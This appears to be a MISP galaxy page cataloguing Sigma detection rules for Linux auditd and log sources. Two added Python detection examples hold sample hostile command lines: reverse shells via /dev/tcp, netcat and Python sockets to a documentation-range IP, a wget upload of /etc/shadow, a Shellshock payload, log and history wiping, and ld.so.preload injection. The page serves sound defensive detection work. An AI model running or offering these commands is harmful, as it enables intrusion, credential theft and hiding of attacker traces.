To see the related clusters, click here.

Bpfdoor TCP Ports Redirect

All TCP traffic from the attacker host on a particular port is redirected to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communication going to TCP port 22, but once it hits the iptables rule it is directed to the shell port, for the attacker host only.

Internal MISP references

UUID 70b4156e-50fc-4523-aa50-c9dddf1993fc which can be used as unique global reference for Bpfdoor TCP Ports Redirect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Rafal Piasecki
creation_date 2022/08/10
falsepositive ['Legitimate ports redirect']
filename lnx_auditd_bpfdoor_port_redirect.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Program Executions in Suspicious Folders

Detects program executions from suspicious non-program folders (e.g. /tmp) that are associated with malware or hacking activity.

Internal MISP references

UUID a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc which can be used as unique global reference for Program Executions in Suspicious Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/01/23
falsepositive ['Admin activity (especially in /tmp folders)', 'Crazy web applications']
filename lnx_auditd_susp_exe_folders.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.t1587', 'attack.t1584', 'attack.resource_development']
Related clusters

To see the related clusters, click here.

Remove Immutable File Attribute - Auditd

Detects removal of the immutable file attribute (chattr -i).

Internal MISP references

UUID a5b977d6-8a81-4475-91b9-49dbfcd941f7 which can be used as unique global reference for Remove Immutable File Attribute - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/09/23
falsepositive ['Administrator interacting with immutable files (e.g. for instance backups).']
filename lnx_auditd_chattr_immutable_removal.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Data Compressed

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID a3b5e3e9-1b49-4119-8b8e-0344a01f21ee which can be used as unique global reference for Data Compressed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate use of archiving tools by legitimate user.']
filename lnx_auditd_data_compressed.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.exfiltration', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Linux Network Service Scanning - Auditd

Detects enumeration of local or remote network services.

Internal MISP references

UUID 3761e026-f259-44e6-8826-719ed8079408 which can be used as unique global reference for Linux Network Service Scanning - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/21
falsepositive ['Legitimate administration activities']
filename lnx_auditd_network_service_scanning.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Screen Capture with Xwd

Detects an adversary creating a full-screen capture with xwd. It is highly recommended to use this rule on servers, due to the high usage of screenshot utilities on user workstations.

Internal MISP references

UUID e2f17c5d-b02a-442b-9052-6eb89c9fec9c which can be used as unique global reference for Screen Capture with Xwd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/13
falsepositive ['Legitimate use of screenshot utility']
filename lnx_auditd_screencaputre_xwd.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

System Shutdown/Reboot - Linux

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

Internal MISP references

UUID 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f which can be used as unique global reference for System Shutdown/Reboot - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_system_shutdown_reboot.yml
level informational
logsource.category No established category
logsource.product linux
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

Password Policy Discovery

Detects password policy discovery commands

Internal MISP references

UUID ca94a6db-8106-4737-9ed2-3e3bb826af0a which can be used as unique global reference for Password Policy Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community, Pawel Mazur
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename lnx_auditd_password_policy_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1201']
Related clusters

To see the related clusters, click here.

System Information Discovery - Auditd

Detects System Information Discovery commands

Internal MISP references

UUID f34047d9-20d3-4e8b-8672-0a35cc50dc71 which can be used as unique global reference for System Information Discovery - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/03
falsepositive ['Likely']
filename lnx_auditd_system_info_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Overwriting the File with Dev Zero or Null

Detects a file being overwritten with dd reading from /dev/zero or /dev/null, which effectively wipes (deletes) its content.

Internal MISP references

UUID 37222991-11e9-4b6d-8bdf-60fbe48f753e which can be used as unique global reference for Overwriting the File with Dev Zero or Null in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/10/23
falsepositive ['Appending null bytes to files.', 'Legitimate overwrite of files.']
filename lnx_auditd_dd_delete_file.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.
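Most of the auditd-based rules above (Possible Coin Miner CPU Priority Param, Data Exfiltration with Wget, Split A File Into Pieces, Clipboard Collection with Xclip, Bpfdoor TCP Ports Redirect, Remove Immutable File Attribute, Overwriting the File with Dev Zero or Null) all match on the argv fields of auditd EXECVE records. The following is an added example, not code from the Sigma project or from this page: it parses EXECVE records, including the hex-encoded arguments auditd emits when an argument contains a space or non-printable byte, and runs simplified re-implementations of those rules over a set of constructed sample records. The rule logic is an approximation written for this example; consult the rule files named above for the exact field matches.

```python
import re
from typing import List, Optional, Tuple

# Constructed auditd EXECVE records (not real captures). The first is the BPFDoor-style
# redirect from the description above; the chattr record shows an argument that auditd
# hex-encodes because it contains a space ("/tmp/my file").
SAMPLE_RECORDS = [
    'type=EXECVE msg=audit(1660000001.100:101): argc=15 a0="/sbin/iptables" a1="-t" a2="nat" '
    'a3="-D" a4="PREROUTING" a5="-p" a6="tcp" a7="-s" a8="192.168.1.1" a9="--dport" a10="22" '
    'a11="-j" a12="REDIRECT" a13="--to-ports" a14="42392"',
    'type=EXECVE msg=audit(1660000002.200:102): argc=3 a0="chattr" a1="-i" a2=2F746D702F6D792066696C65',
    'type=EXECVE msg=audit(1660000003.300:103): argc=3 a0="dd" a1="if=/dev/zero" a2="of=/var/log/auth.log"',
    'type=EXECVE msg=audit(1660000004.400:104): argc=3 a0="wget" a1="--post-file=/etc/shadow" a2="http://203.0.113.10/up"',
    'type=EXECVE msg=audit(1660000005.500:105): argc=3 a0="./xmrig" a1="--cpu-priority=5" a2="--donate-level=1"',
    'type=EXECVE msg=audit(1660000006.600:106): argc=5 a0="split" a1="-b" a2="10M" a3="/tmp/dump.tgz" a4="part_"',
    'type=EXECVE msg=audit(1660000007.700:107): argc=6 a0="xclip" a1="-selection" a2="clipboard" a3="-t" a4="image/png" a5="-o"',
    'type=EXECVE msg=audit(1660000008.800:108): argc=3 a0="ls" a1="-la" a2="/tmp"',
    # SYSCALL records also carry a0..a3, but those are raw register values, not argv.
    'type=SYSCALL msg=audit(1660000008.800:108): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c0a0 a1=55d0c1b0',
]

# aN="quoted value" or aN=HEXSTRING (auditd hex-encodes arguments with spaces/control bytes)
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def parse_execve(record: str) -> Optional[List[str]]:
    """Return argv for an EXECVE record, decoding hex-encoded arguments; None for other record types."""
    if 'type=EXECVE' not in record:
        return None
    argc = re.search(r'\bargc=(\d+)', record)
    if argc is None:
        return None
    argv = [''] * int(argc.group(1))
    for m in ARG_RE.finditer(record):
        idx = int(m.group(1))
        if idx >= len(argv):
            continue
        if m.group(2) is not None:
            argv[idx] = m.group(2)
        else:
            try:
                argv[idx] = bytes.fromhex(m.group(3)).decode('utf-8', 'replace')
            except ValueError:          # odd-length or otherwise malformed hex: keep raw
                argv[idx] = m.group(3)
    return argv

# chattr flag group that clears the immutable bit, e.g. "-i" or "-ai"
CHATTR_UNSET_IMMUTABLE = re.compile(r'-[A-Za-z]*i[A-Za-z]*')

def detect(argv: List[str]) -> List[str]:
    """Apply simplified versions of the auditd rules above; returns the matching rule titles."""
    hits: List[str] = []
    if not argv:
        return hits
    prog = argv[0].rsplit('/', 1)[-1]      # /sbin/iptables -> iptables
    args = argv[1:]
    if prog == 'iptables' and {'-t', 'nat', 'REDIRECT', '--to-ports'} <= set(args):
        hits.append('Bpfdoor TCP Ports Redirect')
    if prog == 'chattr' and any(CHATTR_UNSET_IMMUTABLE.fullmatch(a) for a in args):
        hits.append('Remove Immutable File Attribute - Auditd')
    if prog == 'dd' and any(a in ('if=/dev/zero', 'if=/dev/null') for a in args):
        hits.append('Overwriting the File with Dev Zero or Null')
    if prog == 'wget' and any(a.startswith('--post-file') for a in args):
        hits.append('Data Exfiltration with Wget')
    if any(a.startswith('--cpu-priority') for a in args):
        hits.append('Possible Coin Miner CPU Priority Param')
    if prog == 'split':
        hits.append('Split A File Into Pieces - Linux')
    if prog == 'xclip' and any(a.startswith('image/') for a in args):
        hits.append('Clipboard Collection of Image Data with Xclip Tool')
    return hits

def scan(records: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (program, rule titles) for every EXECVE record that triggers at least one rule."""
    out: List[Tuple[str, List[str]]] = []
    for rec in records:
        argv = parse_execve(rec)
        if argv is None:
            continue
        hits = detect(argv)
        if hits:
            out.append((argv[0].rsplit('/', 1)[-1], hits))
    return out

if __name__ == '__main__':
    for prog, hits in scan(SAMPLE_RECORDS):
        print(f'{prog:10s} -> {", ".join(hits)}')
```

Two details matter in practice: the program name is taken from a0 after stripping any path, so '/sbin/iptables' and 'iptables' are treated alike (an attacker typing the full path does not evade the match), and hex-encoded arguments are decoded before matching, otherwise a path containing a space would never compare equal to the expected string.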

Linux Keylogging with Pam.d

Detects attempts to enable auditing of TTY input via pam.d (pam_tty_audit), which can be abused as a keylogger.

Internal MISP references

UUID 49aae26c-450e-448b-911d-b3c13d178dfc which can be used as unique global reference for Linux Keylogging with Pam.d in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/05/24
falsepositive ['Administrative work']
filename lnx_auditd_keylogging_with_pam_d.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1003', 'attack.t1056.001']
Related clusters

To see the related clusters, click here.

Suspicious Commands Linux

Detects relevant commands often related to malware or hacking activity

Internal MISP references

UUID 1543ae20-cbdf-4ec1-8d12-7664d667a825 which can be used as unique global reference for Suspicious Commands Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/12/12
falsepositive ['Admin activity']
filename lnx_auditd_susp_cmds.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Hidden Files and Directories

Detects an adversary creating a hidden file or directory, i.e. a file or directory whose name starts with a dot.

Internal MISP references

UUID d08722cd-3d09-449a-80b4-83ea2d9d4616 which can be used as unique global reference for Hidden Files and Directories in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/06
falsepositive ['Unknown']
filename lnx_auditd_hidden_files_directories.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Creation Of An User Account

Detects the creation of a new user account. Such accounts may be used for persistence without deploying persistent remote access tools on the system.

Internal MISP references

UUID 759d0d51-bc99-4b5e-9add-8f5b2c8e7512 which can be used as unique global reference for Creation Of An User Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Marie Euler, Pawel Mazur
creation_date 2020/05/18
falsepositive ['Admin activity']
filename lnx_auditd_create_account.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.t1136.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Suspicious Use of /dev/tcp

Detects suspicious commands that use bash's /dev/tcp pseudo-device to open network connections.

Internal MISP references

UUID 6cc5fceb-9a71-4c23-aeeb-963abe0b279c which can be used as unique global reference for Suspicious Use of /dev/tcp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename lnx_susp_dev_tcp.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.reconnaissance']

Shellshock Expression

Detects shellshock expressions in log files

Internal MISP references

UUID c67e0c98-4d39-46ee-8f6b-437ebf6b950e which can be used as unique global reference for Shellshock Expression in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/14
falsepositive ['Unknown']
filename lnx_shellshock.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Remote File Copy

Detects the use of tools that copy files from or to remote systems

Internal MISP references

UUID 7a14080d-a048-4de8-ae58-604ce58a795b which can be used as unique global reference for Remote File Copy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/18
falsepositive ['Legitimate administration activities']
filename lnx_file_copy.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.command_and_control', 'attack.lateral_movement', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

Internal MISP references

UUID 41e5c73d-9983-4b69-bd03-e13b67e9623c which can be used as unique global reference for Equation Group Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/04/09
falsepositive ['Unknown']
filename lnx_apt_equationgroup_lnx.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.g0020', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Symlink Etc Passwd

Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd

Internal MISP references

UUID c67fc22a-0be5-4b4f-aad5-2b32c4b69523 which can be used as unique global reference for Symlink Etc Passwd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/04/05
falsepositive ['Unknown']
filename lnx_symlink_etc_passwd.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.t1204.001', 'attack.execution']
Related clusters

To see the related clusters, click here.

Potential Suspicious BPF Activity - Linux

Detects the presence of warning messages generated by the "bpf_probe_write_user" BPF helper, which could be a sign of suspicious eBPF activity on the system.

Internal MISP references

UUID 0fadd880-6af3-4610-b1e5-008dc3a11b8a which can be used as unique global reference for Potential Suspicious BPF Activity - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Red Canary (idea), Nasreddine Bencherchali
creation_date 2023/01/25
falsepositive ['Unknown']
filename lnx_potential_susp_ebpf_activity.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.defense_evasion']

Commands to Clear or Remove the Syslog - Builtin

Detects specific commands commonly used to remove or empty the syslog

Internal MISP references

UUID e09eb557-96d2-4de9-ba2d-30f712a5afd3 which can be used as unique global reference for Commands to Clear or Remove the Syslog - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/09/10
falsepositive ['Log rotation']
filename lnx_clear_syslog.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.impact', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Buffer Overflow Attempts

Detects buffer overflow attempts in Unix system log files

Internal MISP references

UUID 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781 which can be used as unique global reference for Buffer Overflow Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/01
falsepositive ['Unknown']
filename lnx_buffer_overflows.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.t1068', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Suspicious Reverse Shell Command Line

Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell

Internal MISP references

UUID 738d9bcf-6999-4fdb-b4ac-3033037db8ab which can be used as unique global reference for Suspicious Reverse Shell Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/04/02
falsepositive ['Unknown']
filename lnx_shell_susp_rev_shells.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Suspicious Log Entries

Detects suspicious log entries in Linux log files

Internal MISP references

UUID f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 which can be used as unique global reference for Suspicious Log Entries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/25
falsepositive ['Unknown']
filename lnx_shell_susp_log_entries.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.impact']

Privileged User Has Been Created

Detects the addition of a new user to a privileged group such as "root" or "sudo"

Internal MISP references

UUID 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e which can be used as unique global reference for Privileged User Has Been Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/12/21
falsepositive ['Administrative activity']
filename lnx_privileged_user_creation.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1136.001', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Nimbuspwn Exploitation

Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)

Internal MISP references

UUID 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8 which can be used as unique global reference for Nimbuspwn Exploitation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/05/04
falsepositive ['Unknown']
filename lnx_nimbuspwn_privilege_escalation_exploit.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

JexBoss Command Sequence

Detects a suspicious command sequence characteristic of JexBoss (a JBoss exploitation tool)

Internal MISP references

UUID 8ec2c8b4-557a-4121-b87c-5dfb3a602fae which can be used as unique global reference for JexBoss Command Sequence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/24
falsepositive ['Unknown']
filename lnx_susp_jexboss.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Space After Filename

Detects a file name with a trailing space, which can be used to masquerade an executable as a different file type

Internal MISP references

UUID 879c3015-c88b-4782-93d7-07adf92dbcb7 which can be used as unique global reference for Space After Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/17
falsepositive ['Typos']
filename lnx_space_after_filename_.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.execution']

Code Injection by ld.so Preload

Detects the ld.so preload persistence file. See man ld.so for more information.

Internal MISP references

UUID 7e3c4651-c347-40c4-b1d4-d48590fdf684 which can be used as unique global reference for Code Injection by ld.so Preload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/05/05
falsepositive ['Rare temporary workaround for library misconfiguration']
filename lnx_ldso_preload_injection.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1574.006']
Related clusters

To see the related clusters, click here.

Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

Internal MISP references

UUID 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 which can be used as unique global reference for Suspicious Activity in Shell Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/21
falsepositive ['Unknown']
filename lnx_shell_susp_commands.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Linux Command History Tampering

Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".

Internal MISP references

UUID fdc88d25-96fb-4b7c-9633-c0e417fdbd4e which can be used as unique global reference for Linux Command History Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patrick Bareiss
creation_date 2019/03/24
falsepositive ['Unknown']
filename lnx_shell_clear_cmd_history.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.
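The keyword-style rules above that look for attacker command lines in shell or log text (Suspicious Use of /dev/tcp, Shellshock Expression, Symlink Etc Passwd, Commands to Clear or Remove the Syslog, Suspicious Reverse Shell Command Line, Code Injection by ld.so Preload, Linux Command History Tampering) share one shape: a set of regular expressions run over each line. The following is an added example, not code from the Sigma project or from this page: one regex per rule, run over constructed sample lines, including a web-server access log line carrying a Shellshock payload in its User-Agent field and a benign tar command that must not match. The patterns are simplified approximations written for this example, not the keyword lists of the rule files themselves.

```python
import re
from typing import List, Tuple

# Constructed command lines / log lines (not real captures): shell one-liners as they
# would appear in a command-line or shell-history log, plus one web-server access log
# line whose User-Agent carries a Shellshock payload. 203.0.113.0/24 is documentation space.
SAMPLE_LINES = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "nc -e /bin/sh 203.0.113.5 4444",
    "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"203.0.113.5\",4444))'",
    "ln -sf /etc/passwd /tmp/x",
    'echo "" > /var/log/syslog',
    "history -c; unset HISTFILE",
    "echo /tmp/evil.so > /etc/ld.so.preload",
    '203.0.113.7 - - [10/Mar/2023:10:00:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; /bin/bash -c id"',
    "tar -czf /tmp/backup.tgz /etc",
]

# One regex per rule, in the order results are reported. Simplified re-implementations
# of the keyword lists in the rules above, not the rules themselves.
RULES = [
    ("Shellshock Expression", re.compile(r"\(\)\s*\{")),
    ("Suspicious Use of /dev/tcp", re.compile(r"/dev/(tcp|udp)/")),
    ("Suspicious Reverse Shell Command Line", re.compile(
        r"\b(nc|ncat|netcat)\b.*\s-e\s"          # nc -e /bin/sh host port
        r"|\b(ba)?sh\s+-i\s*>&"                  # bash -i >& /dev/tcp/host/port 0>&1
        r"|socket\.socket\(.*\.connect\(")),     # python one-liner reverse shell
    ("Symlink Etc Passwd", re.compile(r"\bln\s+-s\w*\s+/etc/passwd\b")),
    ("Commands to Clear or Remove the Syslog - Builtin", re.compile(
        r"(\brm\b[^;|]*|\btruncate\b[^;|]*|>\s*)/var/log/(syslog|messages)\b")),
    ("Linux Command History Tampering", re.compile(
        r"history\s+-c\b|unset\s+HISTFILE|HISTFILE=/dev/null|HIST(FILE)?SIZE=0\b"
        r"|set\s+\+o\s+history|ln\s+-s\w*\s+/dev/null\s+\S*history"
        r"|\brm\b[^;|]*\.(bash|zsh|sh)_history|>\s*\S*\.(bash|zsh)_history")),
    ("Code Injection by ld.so Preload", re.compile(r"/etc/ld\.so\.preload")),
]

def classify(line: str) -> List[str]:
    """Return the titles of all rules whose pattern matches the line, in RULES order."""
    return [name for name, pat in RULES if pat.search(line)]

def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line index, matched rule titles) for every line matching at least one rule."""
    out: List[Tuple[int, List[str]]] = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            out.append((i, hits))
    return out

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LINES):
        print(f"line {i}: {', '.join(hits)}")
```

A single line can trip several rules at once (the bash /dev/tcp one-liner matches both the /dev/tcp rule and the reverse-shell rule), which is useful for triage: overlapping low-level hits on one line are a stronger signal than any one of them alone. The Shellshock pattern deliberately matches only the `() {` function-definition prefix, so it fires on the raw access-log line before any decoding.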

Guacamole Two Users Sharing Session Anomaly

Detects a suspicious Guacamole session with two users present

Internal MISP references

UUID 1edd77db-0669-4fef-9598-165bda82826d which can be used as unique global reference for Guacamole Two Users Sharing Session Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/03
falsepositive ['Unknown']
filename lnx_guacamole_susp_guacamole.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1212']
Related clusters

To see the related clusters, click here.

Suspicious VSFTPD Error Messages

Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

Internal MISP references

UUID 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe which can be used as unique global reference for Suspicious VSFTPD Error Messages in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/05
falsepositive ['Unknown']
filename lnx_vsftpd_susp_error_messages.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Relevant ClamAV Message

Detects relevant ClamAV messages

Internal MISP references

UUID 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb which can be used as unique global reference for Relevant ClamAV Message in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/01
falsepositive ['Unknown']
filename lnx_clamav_relevant_message.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.resource_development', 'attack.t1588.001']
Related clusters

To see the related clusters, click here.

Modifying Crontab

Detects suspicious modification of crontab file.

Internal MISP references

UUID af202fd3-7bff-4212-a25a-fb34606cfcbe which can be used as unique global reference for Modifying Crontab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/04/16
falsepositive ['Legitimate modification of crontab']
filename lnx_cron_crontab_file_modification.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

PwnKit Local Privilege Escalation

Detects potential PwnKit exploitation CVE-2021-4034 in auth logs

Internal MISP references

UUID 0506a799-698b-43b4-85a1-ac4c84c720e9 which can be used as unique global reference for PwnKit Local Privilege Escalation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2022/01/26
falsepositive ['Unknown']
filename lnx_auth_pwnkit_local_privilege_escalation.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1548.001']
Related clusters

To see the related clusters, click here.

SSHD Error Message CVE-2018-15473

Detects exploitation attempt using public exploit code for CVE-2018-15473

Internal MISP references

UUID 4c9d903d-4939-4094-ade0-3cb748f4d7da which can be used as unique global reference for SSHD Error Message CVE-2018-15473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/24
falsepositive ['Unknown']
filename lnx_sshd_ssh_cve_2018_15473.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1589']
Related clusters

To see the related clusters, click here.

Suspicious OpenSSH Daemon Error

Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

Internal MISP references

UUID e76b413a-83d0-4b94-8e4c-85db4a5b8bdc which can be used as unique global reference for Suspicious OpenSSH Daemon Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/06/30
falsepositive ['Unknown']
filename lnx_sshd_susp_ssh.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Sudo Privilege Escalation CVE-2019-14287 - Builtin

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

Internal MISP references

UUID 7fcc54cb-f27d-4684-84b7-436af096f858 which can be used as unique global reference for Sudo Privilege Escalation CVE-2019-14287 - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/15
falsepositive ['Unlikely']
filename lnx_sudo_cve_2019_14287_user.yml
level critical
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068', 'attack.t1548.003', 'cve.2019.14287']
Related clusters

To see the related clusters, click here.

Suspicious Named Error

Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts

Internal MISP references

UUID c8e35e96-19ce-4f16-aeb6-fd5588dc5365 which can be used as unique global reference for Suspicious Named Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
